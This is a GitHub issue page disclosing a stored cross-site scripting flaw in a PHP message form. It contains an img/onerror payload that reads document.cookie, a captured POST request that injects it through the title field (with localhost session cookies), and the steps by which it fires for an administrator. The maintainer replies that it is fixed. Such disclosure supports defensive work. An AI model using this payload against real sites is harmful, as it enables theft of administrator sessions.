Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Visit the url:http://localhost/index.php?id=book
Input Xss payload in the title parameter,such as <img src=x onerror=alert(document.cookie)>
<img src=x onerror=alert(document.cookie)>
POST /api.php?c=post&f=save HTTP/1.1 Host: localhost Content-Length: 134 Accept: application/json, text/javascript, */*; q=0.01 Origin: http://localhost X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Referer: http://localhost/index.php?id=book Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_45afd0d5e0ac79310647ac6bc5b5e084=1540478711; UM_distinctid=1677dc16b8434a-05960abb8ab529-6313363-144000-1677dc16b866e; CNZZDATA1707573=cnzz_eid%3D1882766006-1544003086-http%253A%252F%252Flocalhost%252F%26ntime%3D1544024206; admin_auth=eyJpdiI6InZNKzdDV2E1cThadUxrcXZuakszeUE9PSIsInZhbHVlIjoiUVZmcmhkb3dSZDg3bk9YT3ViTmRFSWZUSWgwWVdLSjY5NUl3Wit6RWp5RGhpUHJib0RuaTMxc0N6UU1naXcrTnRHQmJOdnFkSTRXU0tHdDliRFZ4UkJSTkZuaFp4d1BYOTA1Z1ZKSkRINW5tQmo4TkdESERjbHdSQzJQQXlmMTEiLCJtYWMiOiJkMTljYjE1YWMwOWU4ODIzN2I5YTQ1ZjNlNjcwYzdiMDJiMWIyY2U5MmQ1MmFjOWJjYzE4Nzc3OTI2YmE1MmI3In0%3D; XDEBUG_SESSION=PHPSTORM; PHPSESSID=dngti2qdtfhmektapbh7c7et11; PHPSESSION=68qgk06qt2heoci271977dqut1 Connection: close id=book&title=%3Cimg+src%3Dx+onrror%3Dalert(1)%3E&fullname=test&email=1%40qq.com&pic=&file=&_chkcode=4083&content=%3Cp%3E111%3C%2Fp%3E
When the administrator logs in and moves the mouse over to view message information,it will trigger the payload.
The text was updated successfully, but these errors were encountered:
收到,已修正!
Sorry, something went wrong.
No branches or pull requests
Visit the url:http://localhost/index.php?id=book
Step 1
Input Xss payload in the title parameter,such as

<img src=x onerror=alert(document.cookie)>Step 2
When the administrator logs in and moves the mouse over to view message information,it will trigger the payload.



The text was updated successfully, but these errors were encountered: